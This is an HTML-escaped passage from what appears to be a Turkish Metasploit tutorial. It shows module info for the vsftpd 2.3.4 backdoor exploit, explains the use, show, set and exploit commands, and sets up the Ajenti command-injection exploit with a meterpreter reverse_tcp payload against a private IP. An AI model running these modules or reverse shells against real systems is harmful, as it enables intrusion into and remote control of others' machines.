&lt;div class=&quot;language-ruby highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ftp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;vsftpd_234_backdoor&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;info&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ftp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;vsftpd_234_backdoor&lt;/span&gt;

       &lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;VSFTPD&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;v2&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;3.4&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Backdoor&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Command&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Execution&lt;/span&gt;
     &lt;span class=&quot;no&quot;&gt;Module&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ftp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;vsftpd_234_backdoor&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;Platform&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Unix&lt;/span&gt;
       &lt;span class=&quot;no&quot;&gt;Arch&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;cmd&lt;/span&gt;
 &lt;span class=&quot;no&quot;&gt;Privileged&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Yes&lt;/span&gt;
    &lt;span class=&quot;no&quot;&gt;License&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Metasploit&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Framework&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;License&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;BSD&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
       &lt;span class=&quot;no&quot;&gt;Rank&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Excellent&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;Disclosed&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2011&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mo&quot;&gt;07&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mo&quot;&gt;03&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Provided&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;by:
  &lt;/span&gt;&lt;span class=&quot;n&quot;&gt;hdm&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;vi&quot;&gt;@hdm&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;io&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;MC&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;mc&lt;/span&gt;&lt;span class=&quot;vi&quot;&gt;@metasploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;com&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Available&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;targets:
  &lt;/span&gt;&lt;span class=&quot;no&quot;&gt;Id&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;
  &lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;----&lt;/span&gt;
  &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;   &lt;span class=&quot;no&quot;&gt;Automatic&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Check&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;supported:
  &lt;/span&gt;&lt;span class=&quot;no&quot;&gt;No&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Basic&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;options:
  &lt;/span&gt;&lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;    &lt;span class=&quot;no&quot;&gt;Current&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Setting&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Required&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Description&lt;/span&gt;
  &lt;span class=&quot;o&quot;&gt;----&lt;/span&gt;    &lt;span class=&quot;o&quot;&gt;---------------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;--------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;-----------&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;RHOSTS&lt;/span&gt;                   &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;target&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;host&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;),&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;range&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;CIDR&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;identifier&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hosts&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;file&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;with&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;syntax&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;file:&amp;lt;path&amp;gt;&apos;&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;RPORT&lt;/span&gt;   &lt;span class=&quot;mi&quot;&gt;21&lt;/span&gt;               &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;target&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;port&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;TCP&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Payload&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;information:
  &lt;/span&gt;&lt;span class=&quot;no&quot;&gt;Space&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2000&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;Avoid&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;characters&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Description&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;This&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;module&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;exploits&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;a&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;malicious&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;backdoor&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;that&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;was&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;added&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;to&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;the&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;VSFTPD&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;download&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;archive&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;This&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;backdoor&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;was&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;introduced&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;into&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;the&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;vsftpd&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;2.3&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;4&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;tar&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;gz&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;archive&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;between&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;June&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;30&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;th&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2011&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;and&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;July&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;st&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2011&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;according&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;to&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;the&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;most&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;recent&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;information&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;available&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;This&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;backdoor&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;was&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;removed&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;on&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;July&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;rd&lt;/span&gt; &lt;span class=&quot;mi&quot;&gt;2011&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;References&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;no&quot;&gt;OSVDB&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;73573&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;http&lt;/span&gt;&lt;span class=&quot;ss&quot;&gt;:/&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;pastebin&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;com&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;AetT9sS5&lt;/span&gt;
  &lt;span class=&quot;n&quot;&gt;http&lt;/span&gt;&lt;span class=&quot;ss&quot;&gt;:/&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;scarybeastsecurity&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;blogspot&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;com&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;2011&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;mo&quot;&gt;07&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;alert&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;vsftpd&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;download&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;backdoored&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;nf&quot;&gt;html&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ftp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;vsftpd_234_backdoor&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;use&lt;/code&gt; ile kullanılacak olan modül seçilir. (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;use exploit/unix/ftp/vsftpd_234_backdoor&lt;/code&gt;)&lt;/p&gt;

&lt;h5 id=&quot;show&quot;&gt;show&lt;/h5&gt;

&lt;p&gt;show komutu parametresiz olarak kullanılırsa metasploit içerisindeki tüm modüllerin listesini gösterir.&lt;br /&gt;
Herhangi bir tipteki modülleri görmek istersek show ile kullanarak o tipteki tüm modülleri görebiliriz. (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;show auxiliary&lt;/code&gt;)&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;show options&lt;/code&gt; ile seçili modülün değişkenlerini görebiliriz.&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;show payloads&lt;/code&gt; ile seçilebilecek olan payloadları görebiliriz.&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;show targets&lt;/code&gt; ile hedef türünü değiştirebiliriz.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;set&lt;/code&gt; komutu ile parametreleri değiştirebiliriz. (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;set RHOSTS 192.168.1.14&lt;/code&gt;)&lt;br /&gt;
&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;exploit&lt;/code&gt; komutu ile seçilen exploit’i çalıştırabiliriz.&lt;/p&gt;

&lt;div class=&quot;language-ruby highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;use&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;show&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;options&lt;/span&gt;

&lt;span class=&quot;no&quot;&gt;Module&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;options&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;

   &lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;Current&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Setting&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Required&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Description&lt;/span&gt;
   &lt;span class=&quot;o&quot;&gt;----&lt;/span&gt;       &lt;span class=&quot;o&quot;&gt;---------------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;--------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;-----------&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;Proxies&lt;/span&gt;                     &lt;span class=&quot;n&quot;&gt;no&lt;/span&gt;        &lt;span class=&quot;no&quot;&gt;A&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;proxy&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;chain&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;of&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;format&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;ss&quot;&gt;:host:port&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[,&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;ss&quot;&gt;:host:port&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;][&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;RHOSTS&lt;/span&gt;                      &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;target&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;host&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;s&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;),&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;range&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;CIDR&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;identifier&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;or&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;hosts&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;file&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;with&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;syntax&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&apos;file:&amp;lt;path&amp;gt;&apos;&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;RPORT&lt;/span&gt;      &lt;span class=&quot;mi&quot;&gt;8000&lt;/span&gt;             &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;target&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;port&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;TCP&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;SSL&lt;/span&gt;        &lt;span class=&quot;no&quot;&gt;True&lt;/span&gt;             &lt;span class=&quot;n&quot;&gt;no&lt;/span&gt;        &lt;span class=&quot;no&quot;&gt;Negotiate&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;SSL&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;no&quot;&gt;TLS&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;outgoing&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;connections&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;TARGETURI&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;                &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;Base&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;path&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;VHOST&lt;/span&gt;                       &lt;span class=&quot;n&quot;&gt;no&lt;/span&gt;        &lt;span class=&quot;no&quot;&gt;HTTP&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;server&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;virtual&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;host&lt;/span&gt;


&lt;span class=&quot;no&quot;&gt;Payload&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;options&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;python&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;meterpreter&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;reverse_tcp&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;):&lt;/span&gt;

   &lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;   &lt;span class=&quot;no&quot;&gt;Current&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;Setting&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Required&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Description&lt;/span&gt;
   &lt;span class=&quot;o&quot;&gt;----&lt;/span&gt;   &lt;span class=&quot;o&quot;&gt;---------------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;--------&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;-----------&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;LHOST&lt;/span&gt;                   &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;listen&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;address&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;an&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;may&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;be&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;specified&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
   &lt;span class=&quot;no&quot;&gt;LPORT&lt;/span&gt;  &lt;span class=&quot;mi&quot;&gt;4444&lt;/span&gt;             &lt;span class=&quot;n&quot;&gt;yes&lt;/span&gt;       &lt;span class=&quot;no&quot;&gt;The&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;listen&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;port&lt;/span&gt;


&lt;span class=&quot;no&quot;&gt;Exploit&lt;/span&gt; &lt;span class=&quot;ss&quot;&gt;target:

   &lt;/span&gt;&lt;span class=&quot;no&quot;&gt;Id&lt;/span&gt;  &lt;span class=&quot;no&quot;&gt;Name&lt;/span&gt;
   &lt;span class=&quot;o&quot;&gt;--&lt;/span&gt;  &lt;span class=&quot;o&quot;&gt;----&lt;/span&gt;
   &lt;span class=&quot;mi&quot;&gt;0&lt;/span&gt;   &lt;span class=&quot;no&quot;&gt;Ajenti&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;2.1&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;31&lt;/span&gt;


&lt;span class=&quot;n&quot;&gt;msf5&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;exploit&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;unix&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;webapp&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;ajenti_auth_username_cmd_injection&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;set&lt;/span&gt; &lt;span class=&quot;no&quot;&gt;RHOSTS&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.154&lt;/span&gt;
&lt;span class=&quot;no&quot;&gt;RHOSTS&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;172.16&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;mf&quot;&gt;172.154&lt;/span&gt;
